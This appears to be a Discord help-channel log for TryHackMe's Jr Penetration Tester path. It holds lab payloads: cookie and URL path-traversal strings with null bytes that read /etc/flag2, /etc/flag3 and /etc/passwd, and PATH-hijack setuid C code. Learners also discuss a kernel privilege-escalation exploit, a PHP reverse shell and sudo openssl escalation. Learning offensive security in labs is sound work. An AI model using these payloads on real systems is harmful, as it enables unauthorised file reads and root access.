Warning: include() [function.include]: Failed opening 'includes/Admin.php' for inclusion (include_path='.:/usr/lib/php5.2/lib/php') in /var/www/html/chall2.php on line 37
```
Is this a bug or does it work as designed?
Change the cookie so that you have admin access, then find the flag in /etc/flag2
I think you can use developer tools or burp suite.
I changed the cookie to Admin and then I got the warning. How can I paste a screengrab in this thread?
@slender void
Well, if you are doing it correctly and change the cookie to admin, then you will just need to change the cookie and do directory traversal to get the flag.
Just go to #bot-commands and type /verify there; you will get a token option, then go to your THM profile, get the Discord token and paste it here in /verify token. Then you will be verified and can send pics after that.
Do this now
As you changed to admin, do the same thing and instead of admin do directory traversal.
The only thing you have to keep in mind is that it's going to add the .php, which should be removed.
Indeed. I changed the cookie to this value ../../../../etc/flag2%00 and it worked.
Try the third one now
I changed the cookie to this value ../../../../etc/flag2%00 and it worked. Thanks!
Gave +1 Rep to @boreal notch (current: #1424 - 2)
@neon geyser helped you too
@neon geyser helped me too. I have sent him also a thank you!
Gave +1 Rep to @boreal notch (current: #873 - 4)
No worries. 😉
I've been working on Task 8 Challenge 3 of the File Inclusion page for a while and I haven't been able to get past it not recognizing the null byte. I've searched the Discord and everyone seems to be just going to Burp Suite or curl. Is Challenge 3 not possible in the browser alone? I've managed to do the other two in the browser, so I was hoping I'd be able to figure out something for 3, but I can't seem to get past this wall.
IIRC you'll need Burp Suite.
Good to know, I wish that was a bit clearer; it just seemed like a strong suggestion instead of the answer. Thanks again!
Gave +1 Rep to @neon geyser (current: #55 - 129)
Stuck with Linux kernel privilege escalation.
First I could not download the exploit file using the HTTP server on the AttackBox, as karen does not have write permission and the user does not have a home dir. So I downloaded it into the tmp folder and tried to run it from there.
- changed the file permission to executable
But it's not running, as it's treating the comments in the exploit as commands?
Using this exploit: CVE-2015-1328
```
: not found ./37292: /*
: not found ./37292:
./37292: 9: ./37292: *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*: not found
./37292: 10: ./37292: CVE-2015-1328: not found
./37292: 11: ./37292: overlayfs: not found
: not found: ./37292:
./37292: 13: ./37292: user@ubuntu-server-1504:~$: not found
./37292: 14: ./37292: Linux: not found
./37292: 15: ./37292: user@ubuntu-server-1504:~$: not found
./37292: 16: ./37292: user@ubuntu-server-1504:~$: not found
./37292: 17: ./37292: Syntax error: "(" unexpected
```
Found the issue: I did not compile the C code with gcc before running it.
Anyone willing to swap notes on the Jr Penetration Tester path?
Hi! aaaaaand another one struggling with the LFI Challenge 3... only this time I get something different and I don't understand where that's coming from
Can you send the picture
||Intercepted with Burp, switched from GET to POST and had the URL /challenges/chall3.php?file=../../../../../etc/flag3%00, and in the response I get Warning: include(.php) blablabla, as if it filtered my whoooole string||
sent in private to avoid spoiler ^^
Use burp for this
the screenshot is burp
I don't see any screenshot
You can set spoiler for image aswell.
Didn't know! I'll do that next time, thanks
Can you check your dm?
@neon geyser
Doing Linux Privilege Escalation: PATH but getting two issues..
gcc is not installed on the target, so I was not able to compile the C code. I compiled the C code on the AttackBox and sent it to the target via an HTTP server. Although the compiled code is able to start a shell from the
tmp folder, it does not have root privilege.
This is the C code as shown in the write-up (with the includes it needs added so it compiles cleanly; `system("thm")` is the intended PATH-hijack target, not a mistake):
```c
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    setuid(0);        /* only takes effect if the binary runs SUID root */
    setgid(0);
    system("thm");    /* "thm" is resolved through PATH, which is the hijack point */
    return 0;
}
```
I was able to solve the task using another compiled C file named `test` lying in the folder. But I was not able to get to root privilege with the steps mentioned. Am I missing something..
After a closer look, I am guessing that you have to use the test file to get the answer: as a low-privilege user I cannot compile a program with root privilege, hence I won't be able to run a shell as root, at least with PATH. test, on the other hand, was made by someone with root privilege, therefore it works.
Hey, please, one question.... I am doing active recon room, traceroute question.. the question is "In Traceroute A, what is the IP address of the last router/hop before reaching tryhackme.com?" ... why is the answer ||172.67.69.208|| when last (previous) router is on 13th hop?
the last hop is from 100.92.9.3 to 172.67.69.208(THM)
No offensive pentester?
You're right, I missed that one! Gonna start by it first thx ^^
Gave +1 Rep to @fresh rose (current: #2172 - 1)
Does somebody know how to find the directory listing flag? Part of the Jr Pentester module > Viewing the page source exercise. I'm having issues trying to find the flag.txt file in the target website directory, or if someone can tell me how to view the directory in the web browser, I would appreciate it!
What have you checked thus far? You should be able to find it by browsing the site or looking at common site pages.
I've been looking at the HTML source code. I don't know if you mean browsing around on the actual webpage or looking at the HTML source code?
Just looked at the room. Yes, if you look at the target slowly and carefully, it should be there. You don't need to use a tool or anything of the sort, manual browsing should do. I would suggest looking at the links in the source and it should point you to the right direction.
Okay, thank you so much for the tip! I already had the other flags from the secret pages and the framework vulnerability part. I will continue to look for the directory listing flag.
Gave +1 Rep to @prisma raptor (current: #11 - 639)
If I finish this path, will I have the same knowledge as if I had completed the eJPTv2?
You'll have to map the concepts covered in the path against the eJPTv2 outline to know for certain.
If you're looking for more knowledge and have the $, I recommend taking the eJPT course and exam. I have the eJPTv1. Complete the advanced exploitation section in the offensive path. It was a huge help for me.
Hello there! I'm having trouble loading one of the machines from the Web Hacking section in the IDOR practical example. The website/IP address from the machine is unable to load and it gives me a "bad gateway" error. I will appreciate any guidance on the possible issue or solution. Thank you in advance!
Could you verify (see link) and share a screenshot?
@half ibex
This is the error shown, after trying to load the machine
It's working for me with your IP. Try refresh?
Umm okay! Got it! Now it loaded! Thank you @neon geyser
Gave +1 Rep to @neon geyser (current: #42 - 179)
Hello
How can I get my old cert?
I passed the Jr Pentester path before the update to the new cert.
Now I want to download my cert to apply for jobs.
Are you referring to your certificate of completion? By update, is it pertaining to the Burp rooms / module?
Maybe, but what I remember is that I have completed all the modules, and I have downloaded them, but I forget where the download is.
In Burp Suite: Other Modules, Task 4 Decoder: Hashing, on the last challenge, when you open the keys it uses pluma by default, and it opens without line 50, causing the MD5 hash to be wrong.
I personally used the command line for this one: after extracting the files to a folder, cd into it, md5sum *
This is against the spirit of the room, granted.
Exactly, I also got the correct answer like that, but I wasted another hour trying to figure out why it didn't work correctly with Burp Decoder; it is supposed to be beginner friendly.
I am wondering if anyone could help. Doing the room Nmap Basic Port Scans, Task 5. I did nmap -sS (IP) and the answer isn't showing up. I googled the answer and found the port number that should be showing up. I tried nmap -p (answer) (ip) and it says that port is closed. What am I doing wrong?
https://tryhackme.com/r/room/subdomainenumeration
Need help with Task 6: Virtual Hosts.
Whenever I type in the ffuf commands I am getting errors, I am not sure what is incorrect.
I am making sure to replace the placeholder {size} txt but I still am getting an error.
Can you verify and screenshot?
I can't send a screenshot. Here is a drive link https://drive.google.com/file/d/1JFBXpQqaA7VRGsebWNVjX6wK7-NydCaz/view?usp=sharing instead. This is the output I'm getting instead of a list of subdomains.
I edited the message above; I had the incorrect screenshot attached.
@spiral python
Follow the steps described to allow you to share a screenshot (as folks will be hesitant to click on links coming from random people).
Are you using the Attackbox or a kali VM (connected to THM OpenVPN)?
I was using Kali VM
I ran into this issue with the other nmap questions for looking for the missing port. I went to Attackbox today and still didn't get the open ports to show
Have you clicked on the green Start Machine button?
to get the ip address?
Of the target, yes.
Ya, I started the machine within Task 5 to get the IP address, I have the OpenVPN going. I was able to get nmap to work, it just doesn't show any missing ports. I'm going to try it again so I can offer screenshots. Maybe it will work this time though.
```
nmap -sS 10.10.0.200
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-22 02:37 EDT
Nmap scan report for 10.10.0.200
Host is up (0.14s latency).
Not shown: 993 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
25/tcp  open  smtp
53/tcp  open  domain
80/tcp  open  http
110/tcp open  pop3
111/tcp open  rpcbind
143/tcp open  imap
Nmap done: 1 IP address (1 host up) scanned in 1.98 seconds
```
```
nmap -p 6667 10.10.0.200
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-22 02:39 EDT
Nmap scan report for 10.10.0.200
Host is up (0.11s latency).
PORT     STATE  SERVICE
6667/tcp closed irc
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
```
Is 6667 the correct port?
Ya, I googled it and placed it in and it gave me the check mark
Can you try running it again using sudo?
I am running it as root, but I tried and got the same
You may want to try restarting the target, and waiting for 5 mins before running the scan to give the services enough time to start.
Is there a trick to restarting it? I just ask because it's been 24 hours since I first tried and moved on. Still having the same issue.
Thank you for taking the time to try to help me btw
Gave +1 Rep to @prisma raptor (current: #11 - 659)
How long did you wait from the moment you started the target before scanning it?
The first time doing it, 10 to 15 mins, since I start those as I read. This time a few mins.
But trying it now i'm watching the timer. I'll let you know
Just had to terminate the machine right? nothing else for the restart?
After terminating it, you just need to click on Start Machine.
restarted, 5 mins and same 😦
Think it's just bugged, thanks for your help again. I'm going to head to bed
Gave +1 Rep to @prisma raptor (current: #11 - 660)
👍
Here is the screenshot I mentioned before
Can you share the command you used?
Hey guys, I'm in the File Inclusion room, Local File Inclusion - LFI #2, and I cannot understand number 4. Why can we use ?lang in the input to bypass the directory restriction, if ?file is already used? Is it possible to add another parameter on top of the other parameter? How does it work exactly? If I change the site address to just ip.com/lab6.php/?lang=THM-profile/../../../../../etc/passwd, why doesn't it work? Why does it have to have ?file= before?
@remote iris hey there's an error in this room
In task 6 1st question
Actual answer is 3
But it's showing 0 for me
I'm using attackbox
1st question in this
You've got the wrong machine open.
You need to start the machine on Task 6.
Oh
You have the machine open from Task 5.
My bad
The icon circled in red means there is a VM attached.
Hi everyone! I have a doubt about Task 5 in the Local File Inclusion Lab #3, where the instructions say to read /etc/passwd. Why do we need to do 4 "../" in the path traversal instead of 3? I put in some junk input and it says the current path is /var/www/html. So my reasoning goes: if we want to get to the root dir (/) from lab3.php in the html folder, we just need to move from html -> www (1), from www -> var (2), and from var -> root (3). Am I missing something here?
Haven't done the room yet, but only reason I can think of is that there may be another folder under html where the application is being run.
You are directly accessing a Linux machine, so you use ../ to move out of folders in Linux
cd ../ to move out of a folder
I'm having trouble with the "What The Shell Room" Task 13, Question 2:
I created the webshell and am able to access my Kali AttackBox's directory from the victim Linux machine's web server. I have a nc listener active on port 1234, and I have edited my reverse shell script to have my AttackBox IP and port 1234.
When I activate the script on the Linux box I get an Invalid connection error on my netcat and the web browser gives me the error: WARNING: Failed to daemonise. This is quite common and not fatal. Successfully opened reverse shell to 10.10.120.112:1234 ERROR: Shell connection terminated.
Nvm, I found the issue. It's because I set netcat to a specific IP instead of keeping it a wildcard.
https://tryhackme.com/r/room/activerecon
In the room Active Reconnaissance in the path (Jr Penetration Tester)
I have an error in my answer in Task 5 (telnet) 2nd question
What is the version of the running server (on port 80 of the VM)?
Ans: 2.4.10. It's true, but it won't submit there
Replace with the phtml extension
php-reverse-shell.phtml
The answer is not 2.4.10
This is the old answer, which is no longer valid. If you run the command in Task 5, you will get the updated answer.
In the burp suite intruder room.
Question 7
I used this answer
“username=admin&password=admin”
I checked the hint and it should be right but it’s not working I even looked it up on YouTube and it’s the exact same answer but still not working for me
\o/ Just finished the junior pentester path. 100%
what's a good follow up? I'm thinking "Red Teaming"?
There is a recommended order for completing the paths -
Previously, there was an issue with the & character, but this has been resolved.
file inclusion task 2. What am i supposed to do here? https://i.imgur.com/J0PMt9a.png
Like, should I move forward for now and read other tasks?
Oh, I took a look at the next few tasks, seems like this is the option, right?
Can you verify your account and post a screenshot instead?
@cerulean tusk
mb
File inclusion Task 2. What am I supposed to do here?
Looks like I should move forward for now and read other tasks?
What does the task say?
Apply techniques as well as do the challenges
And it also says at the bottom that I should leave it and go forward for now
I'm stuck on the same task @rocky lava , let me know if you find answer.
This is the result of running the Task 3 command
Attackbox or vm?
Can you share the command you used?
attackbox
Can you share the command and wordlists?
command
Can you also share the wordlists?
And passwords?
But the passwords file is a .txt that we already have on the machine, right?
Worked for me ok.
But shouldn't your screenshot show the password that worked for the X username?
Let me try to put my valid_username.txt list in the same directory as yours
I erased them.
ah ok
I'll start it from scratch
but the names you are getting are the same as mine?
Yes.
@remote iris I've found the problem. I don't know why my 10-million-password-list-top-100.txt was in a subfolder that I didn't touch. I've moved it to the same folder as yours and now I've got the answer
I'd like to understand the reason, because I was pointing to the right subfolder even though it was different from yours.
But it put a big question mark in my head, shouldn't all the same rooms be the same?
Seclists could have been updated, I'll need to check.
If it is updated that often, I believe it becomes harder for each other to get help here; this shouldn't change like this. Or at least have better step-by-step or a help button inside the room.
No, it's still the same and the passwords file is in the correct sub directory.
Got it. I did the room again and it was in the right place, but how was mine in a different folder before? I'm 100% sure I didn't change directory
Craziness!
Hey everyone, I've got a question I'm hoping someone can help me with. I'm doing a CTF in a Pentest environment and I've run 'sudo -l' and I get "User srvadm may run the following commands on dmz01:
(ALL) NOPASSWD: /usr/bin/openssl"
I have run the commands listed on GTFOBins for openssl with sudo and I do receive a shell, but I do not get any sudo privileges with it. I have confirmed that I can indeed run openssl as sudo (I was able to read the flag in /root by using a sudo openssl command). Does anyone know if I need to do anything besides run the commands listed on GTFOBins (https://gtfobins.github.io/gtfobins/openssl/#sudo) to privesc? Thanks in advance.
Is this CTF on-going?
Sorry, shouldn't have called it a CTF, it's an HTB module
Wasn't really looking for hints or answers on the module itself, just the practice to see if I was doing something wrong with the commands
If you need HTB support, please seek their help on their server.
I don't need HTB support, I was asking a general question about running sudo with openssl
You're looking for help on an HTB module though.
Nothing I said is more relevant there than it would be here, you're just choosing to take it personally. It's applicable on whatever platform you choose. 12 months TryHackMe sub and 246-day ongoing streak btw
I'm asking a question about running openssl as sudo, that's it
It's nothing personal.
It's in our rules that you have accepted, I don't know HTB's policy on support and help for their rooms or modules.
Literally doesn't apply
Sorry, shouldn't have called it a CTF, it's an HTB module
Yes it does.
Simple question about using Chrome dev tools/network
pertaining to https://tryhackme.com/r/room/idor
I know how to complete this using Burp and Firefox, but where in the Chrome UI do I edit and resend a request?
Okay. You have to copy it, enable pasting in the console, paste it, edit it, and send it.
Anyone else had this weird issue with the machine on the Nmap basic port scan module?
It just literally won't show the correct results
Despite quite literally doing one-to-one what they said
Like, it's just not showing the other services other than rpcbind on port 111 when I try to scan it
It takes like 10 scans until it actually shows up
What Nmap command are you using? Trying -T2 to slow down the scan might help.
Hello everyone, I just finished the Jr Pentester path today, do y'all have any recommendations for what I should do next?
Did you already do the Complete Beginner path? Else next could be the Offensive Pentesting path.
I did finish the Complete Beginner path too
Great idea thanks for your help 🙏
